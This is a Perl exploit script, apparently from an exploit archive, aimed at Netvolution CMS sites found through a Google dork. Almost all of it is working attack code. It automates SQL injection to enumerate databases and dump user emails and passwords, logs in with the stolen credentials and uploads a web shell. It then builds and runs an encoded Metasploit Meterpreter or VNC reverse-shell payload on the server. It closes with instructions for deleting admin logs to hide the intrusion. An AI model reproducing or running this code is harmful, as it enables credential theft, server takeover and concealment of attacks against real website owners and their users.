598 lines
No EOL
20 KiB
Perl
Executable file
598 lines
No EOL
20 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
#########################################################################################
|
|
# #
|
|
# Exploit Title: Netvolution exploit script for CMS Version >= 2.xx.xx.xx #
|
|
# Date: 10/6/2010 #
|
|
# Sotware Link: www.netvolution.net #
|
|
# Bug found : amquen, krumel #
|
|
# Exploited by: krumel #
|
|
# Exploit Coded: mr.pr0n #
|
|
# #
|
|
# Many thanks to icesurfer (author of SQLNINJA) and all p0wnbox members. #
|
|
# I have contact www.atcom.gr no response yet, although it seems that they have patch #
|
|
# partially the software. #
|
|
#########################################################################################
|
|
# #
|
|
# This program is free software; you can redistribute it and/or #
|
|
# modify it under the terms of the GNU General Public License #
|
|
# as published by the Free Software Foundation; either version 2 #
|
|
# of the License, or (at your option) any later version. #
|
|
# #
|
|
# This program is distributed in the hope that it will be useful, #
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
|
|
# GNU General Public License for more details. #
|
|
# #
|
|
# You should have received a copy of the GNU General Public License #
|
|
# along with this program; if not, write to the Free Software #
|
|
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. #
|
|
# #
|
|
#########################################################################################
|
|
|
|
#Using some modules!
|
|
use LWP::UserAgent;
|
|
use IO::Socket;
|
|
use IO::Handle;
|
|
|
|
print "\e[1;31m _ _ _ _ _ _ _ _ _ \e[0m\n";
|
|
print "\e[1;31m | \\ | | | | | | | | (_) | | (_) | \e[0m\n";
|
|
print "\e[1;31m | \\| | ___| |___ _____ | |_ _| |_ _ ___ _ __ _____ ___ __ | | ___ _| |_ \e[0m\n";
|
|
print "\e[1;31m | . ` |/ _ \\ __\\ \\ / / _ \\| | | | | __| |/ _ \\| '_ \\ / _ \\ \\/ / '_ \\| |/ _ \\| | __| \e[0m\n";
|
|
print "\e[1;31m | |\\ | __/ |_ \\ V / (_) | | |_| | |_| | (_) | | | | | __/> <| |_) | | (_) | | |_ \e[0m\n";
|
|
print "\e[1;31m |_| \\_|\\___|\\__| \\_/ \\___/|_|\\__,_|\\__|_|\\___/|_| |_| \\___/_/\\_\\ .__/|_|\\___/|_|\\__| \e[0m\n";
|
|
print "\e[1;31m | | \e[0m\n";
|
|
print "\e[1;31m |_| ...for CMS Version >= 2.xx.xx.xx \e[0m\n";
|
|
|
|
# ************* #
|
|
# Target dork.
|
|
# ************* #
|
|
print "\nGoogle Dork:";
|
|
print "\n\e[1;45mallinurl: 'default.asp?pid'\e[0m\n";
|
|
|
|
# ************ #
|
|
# Main Menu.
|
|
# ************ #
|
|
menu:;
|
|
|
|
print "\n[*] Main Menu:\n";
|
|
print " 1. Automated list site scan for injection.\n";
|
|
print " 2. Export all Infomation_Schema Tables and Columns.\n";
|
|
print " 3. Find all Databases.\n";
|
|
print " 4. Export all usernames and passwords of the 'cms_Users' table.\n";
|
|
print " 5. Manuall exploitation.\n";
|
|
print " 6. Compatibility with the Metasploit Framework.\n";
|
|
print " 7. Exit.\n";
|
|
|
|
print "> ";
|
|
$option=<STDIN>;
|
|
print "\n";
|
|
if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5 && $option!=6 && $option!=7)
|
|
{
|
|
print "\e[1;31mWrong Option!!\e[0m\n";
|
|
goto menu;
|
|
}
|
|
# Select Option.
|
|
if ($option==1)
|
|
{&site_scan} # Automated list site scan for injection.
|
|
if ($option==2)
|
|
{&info_schema_tables_and_columns}# Export all Infomation_Schema Tables and Columns.
|
|
if ($option==3)
|
|
{&extract_db}# Find all Databases.
|
|
if ($option==4)
|
|
{&automated_exploitation}# Export all usernames and passwords of the 'cms_Users'table.
|
|
if ($option==5)
|
|
{&manually}# Manuall exploitation.
|
|
if ($option==6)
|
|
{&metasploit}# Compatibility with Metasploit Project (Under construction).
|
|
if ($option==7)
|
|
{&quit}# Quit it!
|
|
|
|
# ******************************************* #
|
|
# Automated list site scan for injection.
|
|
# ******************************************* #
|
|
sub site_scan
|
|
{
|
|
$sites= "/Users/pentest/Desktop/sites.txt"; ######## ***[E_D_I_T H_E_R_E]*** ##############
|
|
$scan = "10+and+1=convert(int,db_name(1))";
|
|
|
|
# Counter
|
|
$i = 1;
|
|
print " [*]Opening site list... \n";
|
|
open (SITELIST, $sites);
|
|
print " [*]Sitelist opened successfully!\n";
|
|
print " [*]Scanning...\n";
|
|
@sitelist = <SITELIST>;
|
|
print " [*]Results:\n";
|
|
for ($i; $i <= @sitelist; $i++)
|
|
{
|
|
$host = $sitelist[$i];
|
|
chop ($host);
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($host.$scan);
|
|
if ($check->content =~ m/value '(.*)' to/g)
|
|
{
|
|
print "\e[1;36m$host\e[0m\n";
|
|
}
|
|
}
|
|
goto menu;
|
|
}
|
|
|
|
# ********************************************************** #
|
|
# Exploiting *all* the Infomation_Schema Tables and Columns.
|
|
# ********************************************************** #
|
|
sub info_schema_tables_and_columns
|
|
{
|
|
# ***************#
|
|
# Table Counter
|
|
# ***************#
|
|
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
|
|
print "> ";
|
|
$atcom=<STDIN>;
|
|
print "Enter the range scanning of Tables (e.g.: 15): \n";
|
|
print "> ";
|
|
$endt =<STDIN>;
|
|
|
|
# Counter
|
|
$countt = 1;
|
|
print "\n [*] Exloiting Information_Schema Tables...\n";
|
|
$infoschema_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables))";
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$infoschema_t);
|
|
if ($check->content =~ m/value '(.*)' to/g)
|
|
{
|
|
($first_t) = $1;
|
|
print "\e[1;33m$first_t\e[0m\n";
|
|
@chars_t = split(//, "$first_t");
|
|
$got_t = join("%", @chars_t);
|
|
$first_t = "%27$got_t%27";
|
|
for ($countt; $countt <= $endt; $countt++)
|
|
{
|
|
$fullsqli_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables%20where%20table_name%20not%20in($first_t)))";
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$fullsqli_t);
|
|
if ($check->content =~ m/value '(.*)' to/g)
|
|
{
|
|
($next_t) = $1;
|
|
print "\e[1;33m$next_t\e[0m\n";
|
|
@chars_t = split(//, "$next_t");
|
|
$got_t = join("%", @chars_t);
|
|
$next_t = $got_t ;
|
|
$first_t = $first_t.",%27".$next_t."%27";
|
|
}
|
|
}
|
|
}
|
|
else
|
|
{
|
|
print "\e[1;31mFAILED!\e[0m\n";
|
|
}
|
|
# ***************#
|
|
# Column Counter
|
|
# ***************#
|
|
print "Enter the range of scanning Columns (e.g.: 20)\n";
|
|
print "> ";
|
|
$endc =<STDIN>;
|
|
|
|
# Counter
|
|
$countc = 1;
|
|
print "[*] Exloiting Information_Schema Column...\n";
|
|
$infoschema_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns))";
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$infoschema_c);
|
|
if ($check->content =~ m/value '(.*)' to/g)
|
|
{
|
|
($first_c) = $1;
|
|
print "\e[1;33m$first_c\e[0m\n";
|
|
@chars_c = split(//, "$first_c");
|
|
$got_c = join("%", @chars_c);
|
|
$first_c = "%27$got_c%27";
|
|
for ($countc; $countc <= $endc; $countc++)
|
|
{
|
|
$fullsqli_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns%20where%20column_name%20not%20in($first_c)))";
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$fullsqli_c);
|
|
if ($check->content =~ m/value '(.*)' to/g)
|
|
{
|
|
($next_c) = $1;
|
|
print "\e[1;33m$next_c\e[0m\n";
|
|
@chars_c = split(//, "$next_c");
|
|
$got_c = join("%", @chars_c);
|
|
$next_c = $got_c ;
|
|
$first_c = $first_c.",%27".$next_c."%27";
|
|
}
|
|
}
|
|
}
|
|
else
|
|
{
|
|
print "\e[1;31mFAILED!\e[0m";
|
|
}
|
|
goto menu;
|
|
}
|
|
|
|
# *************************************** #
|
|
# Exploiting *all* the inside Databases.
|
|
# *************************************** #
|
|
sub extract_db
|
|
{
|
|
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
|
|
print "> ";
|
|
$atcom=<STDIN>;
|
|
print "Enter the range of scanning Databases (e.g.: 30)\n";
|
|
print "> ";
|
|
$enddb =<STDIN>;
|
|
# Counter
|
|
$countdb = 1;
|
|
print "[*] Exloiting the inside Databases....\n";
|
|
for ($countdb; $countdb <= $enddb; $countdb++)
|
|
{
|
|
$db = "10+and+1=convert(int,db_name($countdb))";
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$db);
|
|
if ($check->content =~ m/value '(.*)' to/g)
|
|
{
|
|
($database) = $1;
|
|
print "[ID:$countdb]","\e[1;35m$database\e[0m\n";
|
|
}
|
|
else
|
|
{
|
|
print "\e[1;31mFAILED!\e[0m\n";
|
|
}
|
|
}
|
|
goto menu;
|
|
}
|
|
|
|
# ***************************************************************** #
|
|
# Exploiting *all* usernames and passwords of the table "cms_Users"
|
|
# ***************************************************************** #
|
|
sub automated_exploitation
|
|
{
|
|
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
|
|
print "> ";
|
|
$atcom=<STDIN>;
|
|
print "Enter the range of scanning userID (e.g.: 20)\n";
|
|
print "> ";
|
|
$end =<STDIN>;
|
|
# Counter
|
|
$count = 1;
|
|
print "[*] Exloiting Usernames and Passwords...\n";
|
|
for ($count; $count <= $end; $count++)
|
|
{
|
|
$useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
|
|
$userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$useremail);
|
|
if ($check->content =~ m/value '(.*)' to/g)
|
|
{
|
|
($email) = $1;
|
|
print "[ID:$count]"," \e[1;32m$email\e[0m";
|
|
$gotmail = $email; # Usage for the section of Metasploit Framework.
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$userpassword);
|
|
if ($check->content =~ m/value '(.*)' to/g){
|
|
($pass) = $1;
|
|
print " : \e[1;32m$pass\e[0m\n";
|
|
$gotpass = $pass; # Usage for the section of Metasploit Framework.
|
|
}
|
|
else
|
|
{
|
|
print " : \e[1;31m-\e[0m\n";
|
|
}}
|
|
else
|
|
{
|
|
print "[ID:$count","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n";
|
|
}
|
|
}
|
|
goto menu;
|
|
}
|
|
|
|
# **************************************** #
|
|
# Exploiting Columns and Tables manually.
|
|
# **************************************** #
|
|
sub manually
|
|
{
|
|
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
|
|
print "> ";
|
|
$atcom=<STDIN>;
|
|
print "Enter the name of your target's Table (e.g.: cms_Users)\n";
|
|
print "> ";
|
|
$table =<STDIN>;
|
|
print "Enter your the name of your target's Column (e.g.: userpassword)\n";
|
|
print "> ";
|
|
$column =<STDIN>;
|
|
print "Enter the range of scanning (e.g.: 10)\n";
|
|
print "> ";
|
|
$endm =<STDIN>;
|
|
|
|
$countm = 1;
|
|
print "[*] Manuall Exploitation...\n";
|
|
for ($countm; $countm <= $endm; $countm++)
|
|
{
|
|
$manually = "10+and+1=convert(int,(se%l%e%c%t(substring($column,1,1000))%20from%20$table%20where%20userID=$countm%29%29";
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$manually);
|
|
if ($check->content =~ m/value '(.*)' to/g){
|
|
($got) = $1;
|
|
print "[ID:$countm]"," \e[1;32m$got\e[0m\n";
|
|
}
|
|
else
|
|
{
|
|
print "[ID:$countm","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n";
|
|
}
|
|
}
|
|
goto menu;
|
|
}
|
|
|
|
# ***************************************************************** #
|
|
# Compatibility with the Metasploit Framework.
|
|
# ***************************************************************** #
|
|
sub metasploit
|
|
{
|
|
if (($gotmail eq "") or ($gotpass eq ""))
|
|
{
|
|
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
|
|
print "> ";
|
|
$atcom=<STDIN>;
|
|
$end = 10;
|
|
$count = 1;
|
|
for ($count; $count < $end; $count++)
|
|
{
|
|
$useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
|
|
$userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";
|
|
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$useremail);
|
|
if ($check->content =~ m/value '(.*)' to/g)
|
|
{
|
|
($email) = $1;
|
|
$gotmail = $email;
|
|
$int = LWP::UserAgent->new() or die;
|
|
$check=$int->get($atcom.$userpassword);
|
|
if ($check->content =~ m/value '(.*)' to/g){
|
|
($pass) = $1;
|
|
$gotpass = $pass;
|
|
$end = $count;
|
|
}}
|
|
}
|
|
}
|
|
if ($atcom =~ m/www.(.*).gr/g){
|
|
($site) = $1;
|
|
}
|
|
|
|
# Checking if the Metasploit Framework is already installed.
|
|
print "[*] Looking for the Metasploit Framework... ";
|
|
$msfcli = "";
|
|
$msfpayload = "";
|
|
if ($msfpath eq "") {
|
|
$path1 = $ENV{PATH};
|
|
@path = split(/:/,$path1);
|
|
foreach (@path) {
|
|
if (-e $_."/msfcli") {
|
|
$msfcli = $_."/msfcli";
|
|
} elsif (-e $_."/msfcli3") {
|
|
$msfcli = $_."/msfcli3";
|
|
}
|
|
if (-e $_."/msfpayload") {
|
|
$msfpayload = $_."/msfpayload";
|
|
} elsif (-e $_."/msfpayload3") {
|
|
$msfpayload = $_."/msfpayload3";
|
|
}
|
|
}
|
|
} else {
|
|
if (-e $msfpath."/msfcli") {
|
|
$msfcli = $msfpath."msfcli";
|
|
} elsif (-e $msfpath."/msfcli3") {
|
|
$msfcli = $msfpath."msfcli3";
|
|
}
|
|
if (-e $msfpath."/msfpayload") {
|
|
$msfpayload = $msfpath."msfpayload";
|
|
} elsif (-e $msfpath."/msfpayload3") {
|
|
$msfpayload = $msfpath."msfpayload3";
|
|
}
|
|
|
|
}
|
|
|
|
if ($msfcli eq ""){
|
|
print "[\e[1;31m FAILED \e[0m]\n";
|
|
print "[-] msfcli not found\n";
|
|
exit(-1);
|
|
}
|
|
|
|
if ($msfpayload eq "") {
|
|
print "[\e[1;32m FAILED \e[0m]\n";
|
|
print "[-] msfpayload not found\n";
|
|
exit(-1);
|
|
}
|
|
print "[\e[1;32m DONE \e[0m]\n";
|
|
|
|
#Retrieve Cookie
|
|
system('curl -k -L -b cookies.txt -c cookies.txt -o step-1.html http://www.'.$site.'.gr/');
|
|
system('curl -k -L -b cookies.txt -c cookies.txt -d email='.$gotmail.' -d password='.$gotpass.' -o step-2.html http://www.'.$site.'.gr/admin/default.asp?ac=2');
|
|
|
|
#Upload Web-Backdoor
|
|
system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@cmdasp.aspx http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');
|
|
|
|
# Choose your payload.
|
|
print "Which payload you want to use?\n";
|
|
print " 1. Meterpreter\n 2. VNC\n";
|
|
|
|
while (($payload ne 1) and ($payload ne 2)) {
|
|
print "msf > ";
|
|
$payload = <STDIN>;
|
|
chomp($payload);
|
|
}
|
|
|
|
if ($payload == 1) {
|
|
$payload = "meterpreter";
|
|
} else {
|
|
$payload = "vncinject";
|
|
}
|
|
|
|
# Choose your connection.
|
|
print "Which type of connection you want to use?\n";
|
|
print " 1. bind_tcp\n 2. reverse_tcp\n";
|
|
while (($conn ne "1") and ($conn ne "2")) {
|
|
print "msf > ";
|
|
$conn = <STDIN>;
|
|
chomp($conn);
|
|
}
|
|
|
|
if ($conn == 1) {
|
|
$conn = "bind_tcp";
|
|
} else {
|
|
$conn = "reverse_tcp";
|
|
}
|
|
|
|
if ($conn eq "bind_tcp"){
|
|
print "Enter your Remote host\n";
|
|
print "msf > ";
|
|
$rhost = <STDIN>;
|
|
chomp $rhost
|
|
} else {
|
|
print "Enter your Public IP\n";
|
|
print "msf > ";
|
|
$lhost = <STDIN>;
|
|
chomp $lhost ;
|
|
print "Enter your Local Host\n";
|
|
print "msf > ";
|
|
$lhost1 = <STDIN>;
|
|
chomp $lhost1 ;
|
|
}
|
|
|
|
if ($conn eq "bind_tcp"){
|
|
print "Enter Remote port number\n";
|
|
} else {
|
|
print "Enter local port number\n";
|
|
}
|
|
|
|
$port = 0;
|
|
while (($port < 1) or ($port > 65535)){
|
|
print "msf > ";
|
|
$port = <STDIN>;
|
|
chomp($port);
|
|
}
|
|
|
|
# Choose your Encryption.
|
|
$enc = -1;
|
|
print "[*] Choose a payload encoding method:\n".
|
|
" 0. None\n".
|
|
" 1. Alpha2 Alphanumeric Mixedcase\n".
|
|
" 2. Alpha2 Alphanumeric Uppercase\n".
|
|
" 3. Avoid UTF8/tolower\n".
|
|
" 4. Call+4 Dword XOR\n".
|
|
" 5. Single-byte XOR Countdown\n".
|
|
" 6. Variable-length Fnstenv/mov Dword XOR\n".
|
|
" 7. Polymorphic Jump/Call XOR Additive Feedback\n".
|
|
" 8. Non-Alpha\n".
|
|
" 9. Non-Upper\n".
|
|
" 10. Polymorphic XOR Additive Feedback\n".
|
|
" 11. Alpha2 Alphanumeric Unicode Mixedcase\n".
|
|
" 12. Alpha2 Alphanumeric Unicode Uppercase\n";
|
|
while (($enc < 0) or ($enc > 12))
|
|
{
|
|
print "msf > ";
|
|
$enc = <STDIN>;
|
|
chomp($enc);
|
|
}
|
|
$encoder = " encoder=";
|
|
for ($enc)
|
|
{
|
|
/^0$/ && do {$encoder = ""};
|
|
/^1$/ && do {$encoder .= "x86/alpha_mixed "};
|
|
/^2$/ && do {$encoder .= "x86/alpha_upper "};
|
|
/^3$/ && do {$encoder .= "x86/avoid_utf8_tolower "};
|
|
/^4$/ && do {$encoder .= "x86/call4_dword_xor "};
|
|
/^5$/ && do {$encoder .= "x86/countdown "};
|
|
/^6$/ && do {$encoder .= "x86/fnstenv_mov "};
|
|
/^7$/ && do {$encoder .= "x86/jmp_call_additive "};
|
|
/^8$/ && do {$encoder .= "x86/nonalpha "};
|
|
/^9$/ && do {$encoder .= "x86/nonupper "};
|
|
/^10$/ && do {$encoder .= "x86/shikata_ga_nai "};
|
|
/^11$/ && do {$encoder .= "x86/unicode_mixed "};
|
|
/^12$/ && do {$encoder .= "x86/unicode_upper "};
|
|
}
|
|
|
|
# Creation of the executable payload.
|
|
$exe = "backup".int(rand()*010101);
|
|
$command = $msfpayload." windows/".$payload."/".$conn.$encoder." exitfunc=process";
|
|
|
|
if ($conn eq "bind_tcp")
|
|
{
|
|
$command .= " lport=".$port." X > /tmp/".$exe.".exe";
|
|
} else {
|
|
$command .= " lport=".$port." lhost=".$lhost." X "."> /tmp/".$exe.".exe";
|
|
}
|
|
if ($verbose == 1)
|
|
{
|
|
print "[v] Command: ".$command."\n";
|
|
}
|
|
system ($command);
|
|
unless (-e "/tmp/".$exe.".exe") {
|
|
print "[-] Payload creation... [\e[1;31m FAILED \e[0m]\n";
|
|
exit(-1);
|
|
}
|
|
|
|
print "[*] Payload creation... [\e[1;32m DONE \e[0m]\n";
|
|
print "[*] Payload (".$exe.".exe) created.\n";
|
|
|
|
$xpl = '/tmp/'.$exe.'.exe';
|
|
|
|
#Upload the executable file to the remote Webserver.
|
|
system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@'.$xpl.' http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');
|
|
|
|
$parameter = $exe.".exe";
|
|
|
|
# The child handles the request to the target, the parent calls Metasploit Framework!
|
|
$pid = fork();
|
|
if ($pid eq 0) {
|
|
sleep(1);
|
|
exit(0);
|
|
}
|
|
|
|
# This is the parent.
|
|
$syscommand = $msfcli." exploit/multi/handler "."PAYLOAD=windows/".$payload."/".$conn." ";
|
|
if ($conn eq "bind_tcp")
|
|
{
|
|
$syscommand .= "LPORT=".$port." RHOST=".$rhost." E";
|
|
print "\e[1;34m$syscommand\e[0m\n";
|
|
} else {
|
|
|
|
$syscommand .= "LPORT=".$port." LHOST=".$lhost1." E";
|
|
print "\e[1;34m$syscommand\e[0m\n";
|
|
}
|
|
#Execute msfcli
|
|
print "Are you ready to execute msfcli? (Press Enter)\n";
|
|
print "msf > ";
|
|
$enter = <STDIN>;
|
|
chomp($enter);
|
|
print " Please Wait...";
|
|
print "[*] Executing the msfcli... [\e[1;32m DONE \e[0m]\n";
|
|
|
|
system("xterm -bg black -fg white -bd black -e ".$syscommand." &"); # If you don't have xterm, install IT!
|
|
sleep(30); # Sleep 30 seconds to fire up Metasploit Framework!
|
|
|
|
#Execute metasploit shell throught Web-Backdoor (cmdasp.aspx).
|
|
system('curl -k -L -b /tmp/cookies.txt -c /tmp/cookies.txt -d __VIEWSTATE=%2FwEPDwULLTE2MjA0MDg4ODhkZKAYI%2BuShUtjaEQHez7lnHYtwecj -d txtArg="C:\Inetpub\EventSites\enterpriseitsecurity.gr\files\\'.$parameter.'" -d testing=excute -d __EVENTVALIDATION=%2FwEWAwLw6bCOCgKa%2B%2BKPCgKBwth5tWrCE%2BPx6jReXWdJAVRgAZWRoxo%3D http://www.'.$site.'.gr/files/cmdasp.aspx');
|
|
}
|
|
|
|
print "# ******************************************************************************#\n";
|
|
print "# CAUTION CAUTION CAUTION CAUTION CAUTION *#\n";
|
|
print "# ******************************************************************************#\n";
|
|
print "# In Order to delete the logs go to http://www.target.gr/files/cmdasp.aspx *#\n";
|
|
print "# and execute the following command : *#\n";
|
|
print "# *#\n";
|
|
print "# sqlcmd -S target_IP -U Database_User -P Database_Password -d Target_Database *#\n";
|
|
print "# -Q ''delete from cms_AdminLog where logRecDbTable='Your_Public_IP' '' -u *#\n";
|
|
print "# *#\n";
|
|
print "# The Username and password for the Database can be found inside global.asa *#\n";
|
|
print "# ******************************************************************************#\n";
|
|
|
|
|
|
# ***********#
|
|
# Quitting :D
|
|
# ***********#
|
|
sub quit
|
|
{
|
|
print "\e[1;31mExiting...Bye-Bye!\e[0m\n";
|
|
exit(1);
|
|
}
|
|
# ***************************************************************** # |